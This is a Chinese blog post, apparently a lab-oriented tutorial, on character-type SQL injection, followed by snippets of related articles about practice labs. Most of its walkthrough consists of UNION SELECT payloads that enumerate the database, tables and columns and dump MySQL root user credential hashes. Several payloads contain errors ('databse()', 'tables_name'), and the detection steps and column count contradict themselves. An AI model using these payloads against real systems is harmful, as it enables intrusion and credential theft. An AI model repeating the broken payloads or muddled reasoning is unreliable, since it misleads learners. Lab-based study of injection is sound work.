sql注入之字符型注入

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量804 收藏 7
点赞数 15
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63436163/article/details/135957499
版权

字符型注入

字符型注入就是用户在前端的输入未经过过滤或处理用户输入的字符串插入到后端数据库查询语句,后端的SQL查询语句将参数值用引号或者括号等特殊符号包裹起来,改变了原有的查询语句,从而形成字符型注入。

具体操作

1、判断是否存在注入点

?id=1 and 1=1还是?id = 1 and 1=2都能够正常显示出页面,所以确定他是字符型注入

?id=1' and 1=1还是?id = 1' and 1=2都能够正常显示出页面,所以确定他是字符型注入

?id=1" and 1=1还是?id = 1" and 1=2都能够正常显示出页面,所以确定他是字符型注入

2、判断字段数order by N

正常的查询列数的语句为

1' order by 1--+

1' order by 2--+

判断出字段数为:2

SELECT * FROM users ORDER BY 4 DESC

order by 后边跟的是SQL语句查询的列数的数字 如果超过了 就报错 Unknown column '4' in 'order clause'
重点:order by是对数据库中返回结果的排序,而不是对数据库的表里面列的排序。
order by 1的含义是排序第一个栏位,order by 2排序第二个栏位。

当order by 3时排序第三个栏位回显正常,而order by 4回显错误,可以判断出当前sql语句向该表查询了三个字段

3、找出可以回显的字段

?id=1' union select 1,2--+;1,2是一个占位回显,判断当前那个列可以回显出内容

4、查看当前数据库、数据库用户以及数据库版本

-1'union select 1,databse()--+

-1' union select 1,version()--+

-1' union  select 1,user()--+

5、获取数据库的表名

-1'    union  select 1,group_concat(table_name) from  information_schema.tables where table_name=databse()--+

6、获取表的字段名

-1'    union  select 1,group_concat(column_name) from  information_schema.columns where tables_name=users--+
7、猜root用户

-1' union select 1,group_concat(user,authentication_string) from mysql.user--+

重点:为什么要用mysql.user因为user表可能可能有多个,所以要指定数据库名。

南棋网络安全
关注
  • 15
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL注入字符注入
qq_64332865的博客
02-17 645
访问sqli-labs网站 用火狐浏览器http://ip/sqli-Labs/Less-2/,登陆后先顶一个GET参数,再网址后边加上?id=1 显示用户名密码为Dumb 可以使用火狐浏览器带的hackbar工具,可以用来调整参数 寻找注入点 分别使用三条payload寻找注入点和判断注入 在原来的网址后加上?id=1’ 运行后报错 然后再换成?id=1 and 1=1 然后就运行正常 再把1=1换成1=2,再显示 结果没...
sql注入讲解ppt.pptx
08-10
2. 字符 SQL 注入:使用字符串来注入 SQL 语句。 3. 时间延迟 SQL 注入:使用时间延迟来注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。...
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 9012
SQL注入原理-字符注入
pikachu 字符SQL注入
m0_61903602的博客
10-25 648
pikachu 靶场 sql 字符
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 969
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
黑客学习-sql注入-字符
weixin_49349476的博客
11-24 1464
判断sql漏洞的类字符,利用post手工注入数据库信息,在利用busp进行注入,最终获取账号和密码
sqli-labs第一节 get-字符注入
weixin_30388677的博客
05-04 101
https://blog.csdn.net/sherlock17/article/details/644544491.SQL注入漏洞的几种判断方法①http://www.heetian.com/showtail.asp?id=40'②http://www.heetian.com/showtail.asp?id=40 and 1=1③http://www.heet...
SQL注入——字符注入和无列名注入实例(超详细,小白也能学得会)
m0_69151365的博客
01-28 1394
在这一关中,我们首先判断了sql注入,发现是字符注入,我们先是利用order by 来确定该表中的列数,有了列数我们就可以通过database()函数获取到该网站所在的库,我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables表中查询到了该库中的所有表,又在columns表通过过滤table_name和table_schema两个字段查找出users表中的列(字段)信息,到这一步之后我们就直接在users表中查找用户和密码,此时注入完成。
SQL注入之基于布尔的盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool盲注、错误显示注入、...
浅析php过滤html字符串,防止SQL注入的方法
12-18
此函数遍历数组,对字符串类的元素执行`stripslashes`函数,去除反斜杠。同时,它也递归地处理嵌套的数组,确保所有可能的输入都被过滤。 其次,为了进一步防止HTML注入,我们可以使用`lib_replace_end_tag`函数...
SQL注入----字符注入
weixin_43622525的博客
02-17 1104
目录 环境 实验 访问网站 给定参数 寻找注入点 判断显示字段数 判断回显位置 库 表 回显数据 sqlmap 库 表 字段 数据 环境 windows10,phpstudy2018,MySQL,Apache dvwa靶场 实验 访问网站 给定参数 寻找注入点 正常显示 未正常显示 判断出为网站存在字符注入点 判断显示字段数 字段数为2 判断回显位置 库 表 回显字段ID 回显数据 ..
N7-SQL注入字符
尐猴子君ii的博客
03-31 969
今天要和大家分享的,是SQL注入字符部分。 原理很简单,依然是依靠创造SQL语句的闭合,来实现将所有的数据全部copy出来。 首先打开pikachu测试平台的SQL-inject的字符注入(get)章节。 首先尝试输入一个错误的名字,发现返回不存在。 然后可以输入一下正确的名字,可以看出,返回了正确名字的id等信息。 我们可以尝试以下数字的 1 or 1=1’;#的语句,发现返回用户名...
DoraBox-SQL注入篇1–数字
qq_45780190的博客
09-18 1166
DoraBox - 掌握常见漏洞攻防 SQL注入篇1–数字 1.判断数据库有几个 输入1查询 输入2查询 输入3查询 发现再也没有数据库查询出来,也就代表着数据库只有两个 2.判断是否存在注入注入字符还是数字(其实我们已经知道注入是数字类,但为了更好的学习,按步骤进行学习) 当输入的参数为字符串时,称为字符字符和数字最大的一个区别在于,数字不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 接着我们分别输入 1 and 1=1 1 and 1=2 输入字符时可以知
SQL注入——字符union注入
heyingcheng的博客
03-04 580
使用union注入拿到靶机中数据库里的所有用户名和密码查询语句:select 列名 from 表名 where 限定语句以sql-labs中的less-1为例。
sql注入(字符dvwa low)
qq_54553731的博客
03-24 3232
sql注入
理论篇8:SQL注入(字符注入和数字注入)
aiojay的博客
05-02 3154
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
字符注入
haodawei123的博客
01-17 1726
字符注入的特点是网站链接末尾不是id=11这样的,而是字符如 http://www.xycj.gov.cn/cks/kw.asp?action=gh 注入点 字母 http://www.zgcforum.org/forum.asp?title=会议议程 注入点中文 测试代码 : ‘+and+’1’=‘1 返回正常 ‘+and+’1’='2 返回错误 ...
复现awvs扫描sql注入字符
05-01
复现awvs扫描SQL注入字符需要按照以下步骤进行: 1. 选择合适的目标:需要选择一个有可能存在SQL注入漏洞的目标,通常是包含动态内容的Web应用程序。 2. 扫描目标:使用AWVS对目标进行扫描。在扫描设置中,需要开启SQL注入扫描。 3. 扫描结果分析:在扫描完成后,需要分析扫描结果,查看是否存在SQL注入漏洞。 4. 构造攻击向量:如果存在SQL注入漏洞,需要构造相应的攻击向量进行测试。字符注入通常涉及到单引号和双引号的转义,以及一些特殊字符的过滤。 5. 验证漏洞:使用构造的攻击向量验证漏洞,如果能够成功执行SQL语句,则说明漏洞存在。 6. 提供修复建议:验证漏洞后,需要提供相应的修复建议,例如使用参数化查询、过滤特殊字符等方式进行修复。 总之,复现AWVS扫描SQL注入字符需要一定的技术基础和经验,需要仔细分析扫描结果和构造攻击向量,以确保漏洞验证的准确性和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南棋网络安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值